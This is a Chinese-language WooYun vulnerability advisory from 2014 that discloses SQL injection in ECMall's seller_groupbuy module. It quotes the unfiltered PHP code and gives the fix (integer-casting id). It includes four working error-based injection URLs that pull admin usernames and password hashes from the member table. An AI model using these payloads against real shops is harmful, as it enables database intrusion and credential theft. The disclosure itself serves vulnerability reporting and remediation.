乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-13: 细节已通知厂商并且等待厂商处理中 2014-06-18: 厂商已经确认,细节仅向厂商公开 2014-06-21: 细节向第三方安全合作伙伴开放 2014-08-12: 细节向核心白帽子及相关领域专家公开 2014-08-22: 细节向普通白帽子公开 2014-09-01: 细节向实习白帽子公开 2014-09-11: 细节向公众公开
RT
搜了下,发现/app/seller_groupbuy.app.php里面还有6处注入:分别是该文件下drop(),start(),finished(),desc(),cancel(),log()函数中的id参数以finished()为例:
function finished() { $id = empty($_GET['id']) ? 0 : $_GET['id'];//id参数未过滤 if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) //进入_ican函数,跟进 { $this->show_warning('Hacking Attempt'); return; } /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_name', )); if (!$this->_groupbuy_mod->edit($id, array('state' => GROUP_FINISHED, 'end_time' => gmtime()))) { $this->show_warning($this->_groupbuy_mod->get_error()); return; } $content = get_msg('tobuyer_groupbuy_finished_notify', array('group_name' => $group['group_name'], 'id' => $id)); $this->_groupbuy_mod->sys_notice( $id, array('buyer'), '', $content, array('msg') ); $this->show_message('finished_ok'); }
_ican函数代码:
function _ican($id, $act = '') { $state_permission = array( GROUP_PENDING => array('start', 'edit', 'drop'), GROUP_ON => array('cancel', 'desc', 'log', 'finished', 'export_ubbcode'), GROUP_END => array('cancel', 'desc', 'finished', 'log'), GROUP_FINISHED => array('drop', 'log', 'view_order'), GROUP_CANCELED => array('drop', 'log') ); $group = $this->_groupbuy_mod->get(array( 'join' => 'belong_goods', 'conditions' => 'gb.group_id=' . $id . ' AND g.store_id=' . $this->_store_id,// id参数未过滤直接带入查询 'fields' => 'gb.state', )); if (!$group) { return false; // 越权或没有该团购 } if (empty($act)) { return $state_permission[$group['state']]; // 返回该团购此状态时允许的操作 } return in_array($act, $state_permission[$group['state']]) ? true : false; // 该团购此状态是否允许执行此操作 }
exp1(finished函数):
http://localhost/ecmall/index.php?app=seller_groupbuy&act=finished&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)#
exp2(drop函数):
http://localhost/ecmall/index.php?app=seller_groupbuy&act=drop&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)#
exp3(srart函数):
http://localhost/ecmall/index.php?app=seller_groupbuy&act=start&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)#
exp4:(desc函数):
http://localhost/ecmall/index.php?app=seller_groupbuy&act=desc&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)#
exp5:(cancel函数):
exp6:(log函数):
对id进行intval整形转换
危害等级:中
漏洞Rank:8
确认时间:2014-06-18 08:41
非常感谢您为shopex信息安全做的贡献漏洞已经提交过,并在处理中非常感谢
暂无
